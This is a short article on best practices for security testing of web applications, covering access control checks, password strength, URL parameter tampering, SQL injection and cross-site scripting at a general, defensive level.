Best practices for Security Testing of Web Applications

The Internet has today digitally connected the world and has made distances redundant. The web has spawned numerous opportunities for business entities to operate seamlessly with online transactions becoming the order of the day. There is a burst of Business Applications on the web, which has raised concerns regarding their security. Any information leak from these applications can lead to loss of sensitive data and impair individuals as well as organizations. Effective Web Application Testing is a solution to mitigate such risks. 

Security Testing implies testing web based applications to check vulnerabilities that could lead to any unauthorised access. This also means confidential data remains confidential and specific areas accessed by users is supported. For example, a data entry operator in an airlines reservation terminal should not get access to crucial reports pertaining to the airlines. Besides, a user should not deny access to other users or change the functionality of an application. Therefore, during Security Testing if the tester identifies any loophole that could be used wrongly, the same should be addressed.   

Web Application Security Testing identifies a number of techniques to address security breaches. The right approach is to use the entire spectrum of testing methodologies as shown below.

1) Adherence to user specific access: Any software system should have user specific areas where only the concerned user should get authorised access. Also, the areas that lay beyond the remit of a specified user should not in any way be accessed by the same user. To elucidate the same let us discuss an example: A data entry operator in an airlines reservation system should be able to enter passengers’ details only and in no way should be privy to forms, reports and database concerning the airlines per se. Such user specific access strengthens the security of a system. 

To check compliance, the tester should create multiple user access points and check if any user specific area is accessible to ‘others.’ In the event of non-compliance, the tester should log the issue and put correctives. 

2) Breaking passwords: User Ids and passwords are frequently used to log into a secured system. The use of password authenticates and authorises a user to access the application. The passwords are usually encrypted, but can be guessed by an intruder. The application should ensure that robust passwords are used by incorporating a combination of alphabets, numerals and special characters. Web Application Testing should also include password cracker programs. Moreover, the tester should see if ‘unencrypted’ passwords or usernames are stored in cookies – a real security issue. 

3) Check the URLs: Hackers generally use the HTTP GET protocol of a web application to source vital information by altering the parameters in a query string. The tester should use the technique to find out if the application accepts such a query, and should that happen, the gaps should be addressed to deter intruders. 

4) SQL Queries: Vital information can be stolen by hackers from servers by posting SQL queries through user input fields. Hence, the tester should ensure that the input field length is predefined. For example, a surname field should be a maximum of 25 characters instead of 150. Importantly, the input field should not allow special characters like single quotation mark (‘) or script redirects. 

5) Cross Site Scripting (CSS or XSS): This method involves stealing vital data from cookies by injecting HTML or JAVASCRIPT codes into the application. The tester, as part of the Web Application Security Testing process should ensure that the application does not accept such a script and the input field lengths remain well defined.